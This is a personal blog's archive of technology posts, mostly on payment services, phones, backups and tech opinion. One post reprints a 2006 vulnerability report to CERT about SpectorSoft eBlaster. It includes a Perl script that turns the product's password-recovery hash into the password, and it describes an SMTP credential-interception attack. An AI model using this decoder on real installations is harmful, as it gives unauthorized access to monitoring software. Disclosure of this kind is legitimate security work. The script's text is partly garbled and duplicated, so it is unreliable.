Personal Website of Yakov Shafranovich » Technology

Essential Small Business Tools You Probably Never Heard Of – Part 1

Yakov Shafranovich — Sun, 15 Jan 2012 17:12:11 +0000

As an owner of a small business it is always surprising to me to find out when speaking with other small business owners about how unaware they are of some of the free and cheap tools available out there to make their business better. In this post, I will list (in no particular order) some of the tools I have used in the past and currently use, all of which have made a big difference in my business. This part 1 covers financial tools.

Square for in-person credit card payments

Normally in order for a business to take credit card payments, a merchant account is required. Opening one is a tedious process and it usually comes saddled with all kinds of application, credit report, etc. fees. Even once the account is established, there are monthly gateway and processing fees, and sometimes a minimum transaction fee as well.

Square offers a great and cheap alternative for merchant accounts. There are no fees for signing up, no monthly fees, and no minimum activity required. When you apply for an account, they send you a free credit card reader which works on conjunction with an iPhone, iPad or an Android phone (yes, you need a cell phone), and hooks into the headphones jack. The only fee they charge is 2.75% for processing transactions. You can also enter credit card numbers manually for a higher processing fee of 3.5% + 15 cents. Receipts are automatically emailed or SMSed to the owner of the card.

PayPal and Google Checkout for online invoicing

While PayPal and Google Checkout are well known for their payment tools that are used on websites, not a lot of people know about their invoicing features. Both services have an option that allows you to request a payment via email, and optionally send an invoice to your customer (here is PayPal invoicing and Google Checkout’s email feature). This is a great feature for online service businesses that do not charge a set price and it avoids the use of merchant accounts. The cost is the same as their regular payment services (about 2.9% + 30 cents) and there are no minimums or monthly fees. PayPal’s invoicing feature is a more advanced than Google’s.

American Express FX Payments for free international wire transfers

Even for a business that always does business within the US, there always comes a time where a foreign client or supplier comes along, requiring ability to wire money internationally. One alternative is to use a payment service like PayPal above, but they tend to charge extra for international payments (as described here). Another alternative is to use a credit card without an international transaction fee but It gets even more complicated when trying to pay a foreign supplier which is not online savvy and expects wire transfers. Regular banks tend to charge a lot for international wires and they also hike up the conversion rates to their advantage just like credit card companies. The end result is that you end up paying through the nose and get a pretty bad conversion rate.

A great alternative that I stumbled on about six months ago is American Express’s FX Payments service. While it is a bit of a pain to sign up for including an application, some phone calls, it is a great service that is worth it. For starters, there are no fees at all and no minimums. You link up your checking account and they withdraw the money via ACH from your checking account, and then transfer it via a conventional international wire transfer. It does take an extra day for processing. Their conversion rates are pretty close to the trading conversion rates for currencies and they have 24/7 toll-free support. I have been using them to pay royalties to oversea authors for several months and have been very impressed with their service.

PayPal for mobile check deposits

Even though business is moving online, conventional paper checks are still used often for payments. One nifty tool that I have found is PayPal’s check deposit feature, which is only available on their mobile apps for the iPhone, iPad and Android. Now you should certainly check with your bank first if they do remote deposit but for those that don’t, PayPal’s free service is a great alternative. You install the app, take a picture of the front and back of the check with your phone, and in about a week the money gets put into your PayPal account and you get an email notification.

There are limits to the service – maximum of $1,000 per check and no more than $4,000 in deposits per month, but for very small business it may be a great alternative. There are no fees of any kind. My only beef with them is that it takes 1-2 weeks to process the check versus 1-2 days for a regular bank. Of course, more and more banks are adding remote deposit as a feature for their mobile apps, so check with your bank often.

Review of Paypal’s Mobile Check Capture Service

Yakov Shafranovich — Mon, 11 Jul 2011 03:23:27 +0000

Being that none of the banks I currently use support remote deposit (taking photos of checks and uploading them instead of bringing the physical checks in), I was very interested to hear that PayPal finally added check deposit ability to their Android app. This post covers my experiences with that service.

First of all, the actual check deposit feature is hard to find, it is not under “Add Money”, rather it is under tools. Second, the Paypal Android app itself seems to be someone unstable since it keeps on occasionally crashes or failing to login. Regardless, once you locate the feature, the actual process seems to be straight forward – sign the check, take a picture of the front and back, and send it in. PayPal recommends that you hold on to the check for 15 days. I do like the fact that no fees are being assessed by PayPal for the service, but time will tell if it will stay that way. Once the check is processed, you receive it as a payment to your PayPal account, and you can then either use it or withdraw it into your bank account. Combined with the PayPal credit card that feeds from your balance, it can actually allow someone to bank completely without having a bank – something that many companies like WalMart, GreenDot and of course your neighborhood check cashing places do. I can easily see blue collar workers that are young and mobile savvy use this feature to deposit checks and then transfer money to relatives overseas instead of the regular check cashing/Western Union route.

I had two problems with the process:

1. There is no indication on the regular Desktop site what is going on with the checks. When the checks are actually processed, they appear in your account as a payment from a merchant called “PayPal Check Capture”, and the only way to figure out what check goes with which payment, or to check on the status of the process is to go into the mobile app on your phone.

2. My biggest problem is time – it took almost 10 days to process a single small amount check while for example, Bank of America deposits checks same day via their ATM if they are put in before 8 PM. That is an absurd amount of time for a check, but perhaps the anti-fraud mechanism is what slows it down.

Overall I am satisfied with the service but everyone should be well aware that this deposit method takes time. It would be interesting to see if combining PayPal Check Deposit and Square for credit processing with a small business would actually eliminate the need for a gateway and a bank account.

Why I Use Amazon for Most of My Online Shopping

Yakov Shafranovich — Tue, 14 Jun 2011 02:12:58 +0000

While I had been online for a long time, over the years I gravitated to use Amazon.com for most of my online shopping. While I do not necessarily like big companies, in this case a lot of what Amazon brings to the consumer is something all online companies should learn from. I often find myself getting something from Amazon for a little more money just to get the benefits they offer. And as the range of stuff they sell expands, I am constantly surprised by what I find – I have bought seeds, lawn mowers and even a snow blower from Amazon in the past.

Here are some reasons why I like Amazon:

Free 2-day shipping and cheap overnight shipping – I have an Amazon Prime membership and take advantage of it. For a busy family, it is often easier to order something online than to actually visit a store. A new trend has been is third party merchants qualifying for Amazon Prime shipping when they use Amazon’s warehouse services.
Reviews are a great resource – many of the reviews, especially the negative ones are unabashedly straight forward and strong. I have found, time and time again, that user reviews steer me in the right direction.
Great returns policy - for most items, they can be returned hassle free without paying shipping if something does not work. Even when I no longer want the item, it only costs the shipping itself to return something, and I often able to get cheaper shipping myself.
Guarantee for Third Party merchants – one of the great things about Amazon (unlike Ebay) is that they guarantee most of their third party transactions, so even when things are not being bought from Amazon itself, there is still protection there.

Two Vulnerabilities in SpectorSoft/eBlaster Products

Yakov Shafranovich — Thu, 07 Apr 2011 03:52:30 +0000

This information is quite old and I am not sure if it is still valid. However, the vendor never responded to what I sent them even with assistance of CERT. This was assigned VU#707817 in 2006.

- -------- Original Message -------- Subject: Re: Two vulnerabilities in SpectorSoft products VU#707817 Date: Mon, 20 Nov 2006 17:10:13 -0500 From: Yakov Shafranovich To: CERT(R) Coordination Center


Background:
Spectorsoft Corp makes several products for monitoring computer and

Internet usage including eBlaster, Spector Pro, and others. Some of the

programs provide an option to email copies of the reports to the

subscriber via regular SMTP.
Also, the software provides ability for a user who forgot his password

to the software, to recover it by pressing a hidden key combination 6

times and obtain a special "hash" code. The hash code is sent to the

vendor and a password is returned. This process is posted publically on

the vendor's website:
http://www.spectorsoft.com/support/eblaster_windows/faq.html
Vulnerability #1:
The algorithm used to generate the lost password hashes is not secure,

and easily crackable, thus allowing anyone to easily access an installed

copy of the vendor's product even if a password is unknown. THIS

INFORMATION WAS OBTAINED BY SIMPLY ANALYZING A PASSWORD HASH FOR A KNOWN

PASSWORD. This could have been easily remedied by using a form of

public/private key encryption.
Second, the viewer executable which allows for login is easily found in

WINDOWS\SYSTEM32 directory - it is usually a 1.5 or 3 MB executible and

can be found there even on a system where the software is running in

stealth mode.
The algorithm for decoding the hash is as follows:
1. Given numeric hash of 7 numbers as follows:
288-1488-1776-336-624-912-5424
2. The first number is a magic value:

288
3. The last number is a checksum, equivelant to the sum of all numbers

in the hash. In this example:
288 + 1488 + 1776 + 336 + 624 + 912 = 5424
4. Taking the lowest number in the hash excluding the first and the

last, gives your the first character. Going from there and wrapping to

the front gives you the rest":
288-1488-1776-336-624-912-5424

 4   5    6    1   2   3
5. Dividing each number except the first, by the magic value and adding

its place # gives you the ASCII value of the password:
#1 | 3 | 336 mod 288  = 48 | 48 + 1 = 49 | 1 |

#2 | 4 | 624 mod 288 = 48 | 48 + 2 = 50 | 2 |

#3 | 5 | 912 mod 288 = 48 | 48 + 3 = 51 | 3 |

#4 | 6 | 288 / 6 = 48 | 48 + 4 = 52 | 4 |

#5 | 1 | 1488 mod 288 = 48 | 48 + 5 = 53 | 5 |

#6 | 2 | 1776 mod 288 = 48 | 48 + 6 = 54 | 6 |
6. The first number's value is equal to the itself divided by the total

amount of numbers excluding the checksum:
288 / 6 = 48
7. The result is: '123456'
The perl code is as follows. A live copy of this script is available at:
[redacted]
=====================================================================

#!/usr/bin/perl
use lib qw(.);

use CGI;

use CGI::Carp qw(fatalsToBrowser);
#--- Check for parameters ---

if ($ENV{'REQUEST_METHOD'} eq "GET")

 { $in = $ENV{'QUERY_STRING'}; }

else

 { $in = ; }

$q=new CGI($in);
if($q->param('hash') eq '')

{  print "Content-Type: text/plain\n\n";

 print "500 ERROR: Missing parameter 'hash'.\n";

 exit;

}
#--- prepare parameters ---

my $hash_raw = $q->param('hash');

my $dd = $q->param('dd');

my $count = ($hash_raw =~ tr/-//);

my @nums = split('-', $hash_raw);

my $magic = @nums[0];

my $sum = @nums[$count];

my $lowest = $count;
#--- check the checksum ---

my $check = 0;

for($i=0; $i < $count; $i++) {

  $check = $check + @nums[$i];

}
if($check != $sum) {

 print "Content-Type: text/plain\n\n";

 print "Checksum DOES NOT match: is $check, must be $sum!\n";

 exit;

}
print "Content-Type: text/html\n\n";

print "Hash Calculator (c) 2006";

print "
Hash Calculator (c) 2006
";
print "
";

print "";

print "";
if($dd eq 'y') {

  print "
";

  print "";

}
#--- find the lowest number ---

for($i=1; $i < $count; $i++) {

  if(@nums[$i] < @nums[$lowest]) {

      $lowest = $i;

  }

}
if($dd eq 'y') {

  print "
";

  print "";

  print "";

  print "";

}

print "";

print "Name Value
Original Hash $hash_raw
Total Characters $count
Magic Value $magic
Checksum $check = $sum (matches!)

Starting Slot $lowest
Starting slot value @nums[$lowest]
Calculation table below :
";

}
#--- print the first part of the result ---

my $pass = '';

my $j = 1;

for($i = $lowest; $i < $count; $i++) {

  my $raw = @nums[$i] - $magic*$j;

  my $res = $raw + $j;

  my $ch = chr($res);

  $pass = $pass . $ch;

  if($dd eq 'y') {

      print "#$j | $i | @nums[$i] - ($magic*$j) = $raw | $raw + $j =

$res | $ch |
";

  }

  $j++;

}
#--- process the magic part ---

my $raw = @nums[0] / $count;

my $res = $raw + $j;

my $ch = chr($res);

$pass = $pass . $ch;

if($dd eq 'y') {

  print "#$j | $i | @nums[0] / $count = $raw | $raw + $j = $res |

$ch |
";

}

$j++;
#--- process the rest ---

for($i = 1; $i < $lowest; $i++) {

  my $raw = @nums[$i] - $magic*$j;

  my $res = $raw + $j;

  my $ch = chr($res);

  $pass = $pass . $ch;

  if($dd eq 'y') {

      print "#$j | $i | @nums[$i] - ($magic*$j) = $raw | $raw + $j =

$res | $ch |
";

  }

  $j++;

}

if($dd eq 'y') {

  print "
Password $pass
";
exit;
========================================================================
Vulnerability #2:
This is more of a design issue. When eBlaster is used to send reports

via SMTP the software is subject to a man in the middle act. By

monitoring network traffic one can see the email account and credentials

to which the reports are being sent, leading to a possibility of

exposing security credentials AND ability to fake the reports. The

reports are not digitally signed or encrypted.

Name	Value
Original Hash	$hash_raw
Total Characters	$count
Magic Value	$magic
Checksum	$check = $sum (matches!)
Starting Slot	$lowest
Starting slot value	@nums[$lowest]
Calculation table below :
"; } #--- print the first part of the result --- my $pass = ''; my $j = 1; for($i = $lowest; $i < $count; $i++) { my $raw = @nums[$i] - $magic$j; my $res = $raw + $j; my $ch = chr($res); $pass = $pass . $ch; if($dd eq 'y') { print "#$j \| $i \| @nums[$i] - ($magic$j) = $raw \| $raw + $j = $res \| $ch \| "; } $j++; } #--- process the magic part --- my $raw = @nums[0] / $count; my $res = $raw + $j; my $ch = chr($res); $pass = $pass . $ch; if($dd eq 'y') { print "#$j \| $i \| @nums[0] / $count = $raw \| $raw + $j = $res \| $ch \| "; } $j++; #--- process the rest --- for($i = 1; $i < $lowest; $i++) { my $raw = @nums[$i] - $magic$j; my $res = $raw + $j; my $ch = chr($res); $pass = $pass . $ch; if($dd eq 'y') { print "#$j \| $i \| @nums[$i] - ($magic$j) = $raw \| $raw + $j = $res \| $ch \| "; } $j++; } if($dd eq 'y') { print "
Password	$pass

Additionally, even when using TLS, it is possible in theory to run a man in the middle attack by mapping the destination SMTP server's IP to localhost via hosts.txt, and running a rougue SMTP server with TLS locally.

Running Mac OS X on Ubuntu 10.10 with VirtualBox 4

Yakov Shafranovich — Thu, 07 Apr 2011 02:49:10 +0000

Just some short notes on running Mac OS X under Ubuntu 10:

1. Get a VMware image for Mac OS X, an ISO or make a copy of an existing Mac OS installation into VMWare or VirtualBox disk image.

2. Create a new VirtualBox 4 VM as follows:

OS Type: Mac OS X server OR BSD/FreeBSD
Base RAM: 1 GB
Enable IO-PIC
Disable EFI – VERY IMPORTANT
Enable VTx+/AMD V+

3. Add the disk image to VB and start.

Screenshot below:

Comodo SSL Breach and Mobile Devices

Yakov Shafranovich — Fri, 25 Mar 2011 13:20:48 +0000

A recent breach at a SSL Certificate Authority (Comodo) had nine fake SSL certificate issued as a result for sites like Gmail, Yahoo, etc. [details here at the EFF]. While desktop browsers issued updates, the overlooked issue here is mobile. Browsers on mobile devices are usually in firmware, and issuing firmware updates is not trivial. That means that currently most mobile devices are vulnerable to this fake SSL mess – something that no one has mentioned.

Saying GoodBye to Palm and Sprint, Part II

Yakov Shafranovich — Thu, 10 Mar 2011 02:52:20 +0000

(followup to part I)

I have been using Virgin Mobile USA’s Samsung Intercept for about 2 months now. Good things I have found:

Cheap pricing – paying a little less than $80/mo for two phones, with 1,200 minutes each, and unlimited texting/web
Android 2.1 with access to Android Market
Pretty much the same coverage as Sprint PCS
Works great with WiFi

Some bad things:

No roaming
No three way calling
Takes a long time to boot
The phone is pretty slow and locks up when too many things are running. However, for my purposes, which does not use a lot of running services, it works great.
Does not run Android 2.2 (yet, although an update is coming on March 25th) – speed should get better with 2.2
The default browser is sort of sluggish, but alternatives like Opera Mobile work great

Overall I would have to say that it is a great deal for the price I am paying, however, it is not for someone who is looking for playing Android games, but for basic usage it seems to be fine.

Irresponsible Security Disclosure: Square and VeriFone

Yakov Shafranovich — Thu, 10 Mar 2011 02:43:06 +0000

Techcrunch posted a story earlier about an open letter from a company called VeriFone which is a traditional credit card processor. They apparently claim to have discovered a security vulnerability in a competitor’s product, Square. The vulnerability is that the competitor’s hardware credit card reader does not encrypt data between the reader and the host phone, allowing in theory for an easy and free skimmer. They even went as far releasing a free app that can do that.

Now the problem is that security vulnerabilities have a process that most security researchers follow – they tell the vendor first, or use an intermediate party like CERT as a go in between. The reason for that is that the vendor should be given an opportunity to fix the problem first. In this case this responsible disclosure policy was not followed.

The vulnerability itself is not very advanced – people can copy credit card numbers by hand if they have your card, and they type in numbers manually as well. HOWEVER, the issue is that of a competitor using this as leverage to drive people away . Considering that VeriFone is a public company, this may have legal repercussions as well.

This can be based compared to Microsoft going around and advertising Linux security holes, or Google doing the same to Apple. Note, that none of them have done this, ever. Why – because if companies start doing this, the entire disclosure process breaks down and everyone is worse off.

Saying GoodBye to Palm and Sprint, Part I

Yakov Shafranovich — Mon, 14 Feb 2011 03:55:38 +0000

I have been a loyal user of Palm’s PalmOS devices since their earlier days. I have gone through the full gamut of Handspring and later Palm devices such as the Treo 300, 600, all the way to the latest WebOS and the Palm Pre. I have also been a SprintPCS customer since 2000 for over 10 years. And I have finally made a big leap away from both Sprint and Palm. Here is why:

Palm:
I have stayed with Palm devices all the way to the new WebOS launch. I waited about 6 months after launch to see what would happen before getting a Palm Pre. A year later, I would still use it but I got really sick of it. The main reason – the browser sucks and there are no alternatives. On Android, iPhone, Symbian even the low level J2ME phones all have alternatives. Not so WebOS. Then I started looking at some innovative mobile services out there such as RedLaser barcoding scanning, Square payments, etc. None of these were planning to support WebOS any time soon. Then I switched to Android – and you know – it was liked coming out of a dark place into the light. While I have never being a big fan of apps and concept of apps, on Android the app concept actually makes sense. I have apps like Google Reader, Mint, and Gmail all syncing in the background and ready to go when I am, instead of the browser. Any task I need to do has an app for that. I purposely did not want the iPhone due to its closed nature and expensive plans.

Why do apps make sense? Because even on a fast mobile device, browser access is still clunky. Applications that can store assets locally and sync in the background alleviate that to a very large degree.

Sprint:
As I mentioned above, I have been a SprintPCS customer for over 10 years. I have been paying $150 for a shared family plan of 1,500 minutes. Yes, I like mobile to mobile to any company, not just Sprint; and their network isn’t so bad. But the same exact plans I could get on Boost or Virgin Mobile for half the price (while ironically they are owned by Sprint). Why should I pay through the nose for the same exact network while getting nothing in return? The real clincher was the new $10 premium data fee imposed on all smartphones even though I use WiFi most of the time with my Palm Pre. It is not enough to gauge me on the plan, they want an extra $20 per months for nothing? So I said goodbye and got a Virgin Mobile Intercept instead for me and my wife.

More to come on Virgin Mobile experience…

Free, Easy to Use Porfolio Tracker

Yakov Shafranovich — Fri, 24 Dec 2010 03:55:47 +0000

My brother just released version 0.7 of his free and easy to use porfolio tracker called “Frano”:

The application is located at http://frano.carelessmusings.com and is a transaction based portfolio tracker similar to yahoo/google/morningstar portfolios. If you have an investment portfolio and you want to be able to take a quick look at how you are doing day to day this is for you. If you’re not investing or have a 401k that is fire-and-forget then thanks for reading

It is open source with the source on github..

How WikiLeaks Foreshadows the Future of Newspapers

Yakov Shafranovich — Tue, 14 Dec 2010 01:35:48 +0000

The most interesting thing about the recent WikiLeaks episode with stolen US diplomatic cables is not WikiLeaks itself, rather it is the integral role that newspaper partners have and are playing in this particular scenario. Yes, there are a ton of cables but most citizens do not have the interest, background or time to figure out the importance of a particular cable. This is where the news media came in with their experience and research, and have managed to highlight a selection of important and crucial information, while providing the necessary background to understand them.

IMHO, this foreshadows the role newsmedia will play in the future. In the increasingly digital world where anyone can publish their words online, in paper form, as a podcast or a video for free, we will increasingly rely on both traditional and non-traditional gatekeepers to curate that mass amount of information and sort of narrow it down for us. This is what the old “traditional” gatekeepers are morphing into – news media, record companies, publishers and etc. At the same time we may see the grown of new industries. For example, how many people may be willing to pay or participate in a local book store’s club where a person who knows them personally will pick out a book specifically for them every month. That may be a new business, or something local book stores and librarians may adapt to.

In a world where we increasingly rely on machines to make choices for us such as search engine, a special service with a personal touch may be a new industry. Same goes for news papers, we may see the rise of “personal” newspapers where people who know us personally, will provide us with a selection of interesting articles, all while earning a living.

Using Google Apps To Protect Your Gmail Account

Yakov Shafranovich — Thu, 09 Dec 2010 04:35:20 +0000

With a slew of hijacked and compromised Gmail accounts from people I know, I started thinking about an easy way to protect yourself from it. I did come up with a free but not so simple solution:

1. Sign up for the free Google Apps for Domain package.

2. Create a special user for administrating the domain whose password and reset credentials are different from your regular ones. Make sure that the secondary email address points somewhere else like your phone (see here for a list of SMS gateways).

3. Setup your regular account and make sure NOT TO GIVE IT domain admin privileges or same password.

4. If you account gets hijacked or compromised, whip out the special domain administrator account, login and reset your regular account password.

UPDATE: Of course, don’t forget backup services like Backupify.

Sponsored Links:

Now that you’re protected with your special free domain administrator account, learn to trick out Google Apps for your domain.

When Too Many USB Devices Can Be a Bad Thing

Yakov Shafranovich — Fri, 15 Jan 2010 04:19:08 +0000

Just a strange problem I ran into recently with a client. They were using a Windows XP computer with multiple USB devices. Somewhere after about 300 inserts and removes, Windows gave the following error message

The system has reached the maxium size allowed for the system part of the registry. Additional storage requests will be ignored.

Once that happens, all kinds of weird behavior starts to occur beginning with the fact that USB devices no longer work. The cause of this is due to the fact that every time a USB device is inserted, it creates registry entries. Apparently, with storage devices like Flash drives it is even worth, since there may be multiple devices – one for the drive, one for the actual physical key, and possibly a bridge as well. While Windows XP is not supposed to have such limits, it does occur, especially on systems using the “3GB” switch for bootup.

The solution – download the VxScrub utility from Veritas/Symantec which will clean out your registry from any old entries.

New Fees for Google Checkout

Yakov Shafranovich — Wed, 11 Mar 2009 18:42:09 +0000

Google announced today changes to their fee structure for Google Checkout. The new fees bring their service in line with Amazon Payments and Paypal as seen in the chart below:

Why the Desktop Still Matters

Yakov Shafranovich — Thu, 18 Sep 2008 03:55:10 +0000

Over the past year or two, there has been a movement in technology circles to move more and more applications, including desktop ones, to the cloud – i.e. servers running remotely and accessible via the web browser. Some have gone as far as stating that the desktop is dead and the browser will be the new OS of the web. However, we tend to forget why the desktop still matters – it provides tremendous computing power locally without any network latencies. With projects like Google Gears, the difference between the desktop and the web, is blurry but it shows that even companies like Google which are built entirely on web applications, see value in offering something that works on the desktop.

My personal opinion is that we will probably end up with a hybrid model – unlike the mainframes of years gone by where all processing was central, and the PCs of yesterday which offer all processing locally; the future is probably a mix where applications work where they do best – locally or remotely, and the difference between the computer and the cloud is seamless. This is why projects like Microsoft’s Live Mash and Apple’s sync service, as well as Mozilla’s and Opera’s similar initiatives are so interesting – they point to the future of the web.

Just my two cents…

Simple, Secure and Unlimited Backups on Linux

Yakov Shafranovich — Thu, 18 Sep 2008 03:43:42 +0000

About six months ago, my trusty Sony VAIO laptop died – a victim of the infamous DC power jack problem. I ended up building a new desktop (AMD X2 5000, 2 GB of RAM, two hard drives in RAID configuration, lots of fans). In the process, I also took the plunge and switched from Windows XP to Ubuntu Linux. So far, I have been very happy using Linux and sort of suprised how well the desktop compares to Windows (hopefully a later post will summarize my experiences).

But one thing that I missed the both is online backup software that I used to use – Carbonite and Mozy. I have been using Carbonite for over a year and it has paid for itself several times. I was planning to switch to Mozy Pro at the time so I can get their “30 days of changes” feature but my laptop died first. Being a busy kind of guy, I never got around to looking for something on Linux until now. The funny thing is that even though I am spread out among several servers and cloud environments with multiple projects in different online systems, there is still plenty of local data and projects which I rather not move to the web (a subject for another post).

I had several requirements for backups:

Unlimited storage with my own control over it – ability to backup to Amazon S3
Encrypted backups with my own encryption key, not accessible to the provider – I don’t want my storage to be subpoenable or accessible to hackers if my Amazon credentials get public
Keeping 30 days worth of changes like Mozy does – you never know when you need that old file
Automatic backup at regular intervals
GUI interface preferred
Ability to select which folders/files to backup
Incremental backup
Bandwidth throttling like Mozy and Carbonite

After looking around, the best open source solution I found was a combination of cron jobs, tar, some sort of an S3 FUSE or shell interface, and lots of hacking. The problem is that I do not have the time to do the hacking which would probably take a few hours. So I ended up trying out JungleDisk which does all of the above but will cost $20 after the 30 day trial. As I wrote in my previous post, it is an easy to use tool that solves a specific problem, one that I would be happy to pay a low fee for rather than do it myself.

As I write this, JungleDisk is copying about 3 GBs of data to S3. I will try to post a followup in a few weeks.

How to Make Money in Software (on Any Platform)

Yakov Shafranovich — Thu, 18 Sep 2008 03:20:44 +0000

In one sentence:

Provide an easy to use tool that solves a persistent problem.

That was my experience recently with a backup solution for Linux – while there were many open source and free tools out there, a commercial easy to use tool with a low cost was the one that one the day. Why? Because my time costs money and it is worthwhile to pay a small fee rather than spend several hours figuring out how to do it myself.

More to come…

Simple Solution for Amazon’s Web Services Reliability

Yakov Shafranovich — Sun, 17 Feb 2008 03:25:14 +0000

This past Friday a major 2 1/2 hour outage of Amazon web services hit the Internet. The blogs were abuzz with the gory details but the resounding scheme has been that it is not reliable enough yet. Being an Amazon AWS user as well as many others who visit their forums, it is a well known fact that Amazon’s web services experience issues on a frequent basis (although not as bad as Friday). This is why for example, my own projects that use Amazon’s web services do so on a asynchronous basis.

In my personal opinion, there is a very simple solution to make their services very reliable and to make people trust them. Just host all of Amazon.com’s images on the web services. Being that Amazon as whole makes billions from their sites versus a paltry 130 million from the web services, that would force their web services team to provide high reliability as well as restore trust in the service.

Just my own two cents.

Hi-tech Thiefs

Yakov Shafranovich — Sun, 19 Aug 2007 20:25:27 +0000

Someone told me recently that some local thiefs have begun to use computers to try detecting which houses have Wifi networks before deciding to break in. The ones with Wifi networks are assumed to have a computer and are robbed first.

SiteMeter Responds

Yakov Shafranovich — Wed, 11 Apr 2007 02:55:13 +0000

As seen in the comments of my previous posts and here, Sitemeter decided to respond. Two points:
1. Why wait for over a week before a response? Blogs are there for a reason – its gives companies ability to respond quickly.
2. Why not post about it on their own blog?

Setting that aside the crux of Sitemeter’s argument has been that Specific Click’s cookies aren’t spyware and if anti-spyware companies label it as such, it is their problem. Additionally, Specific Click provides an opt out option and so does Sitemeter itself. They also were nice enough to update their privacy policy (but not before I filed a complaint with the FTC).

However, they tend to miss the point – the issue is not what they did but rather how they did it. Any company has a basic responsibility towards their customers about informing them of major changes before doing them. In Sitemeter’s case if they would have blogged about it ahead of time AND let people have an option of opting out, it would have been very different. Instead, they did it without asking AND did not do anything about it for over a week after the story broke. All of which makes me very suspicious. For now, I am still holding out for a little bit to see if anything changes before making my decision to use their services.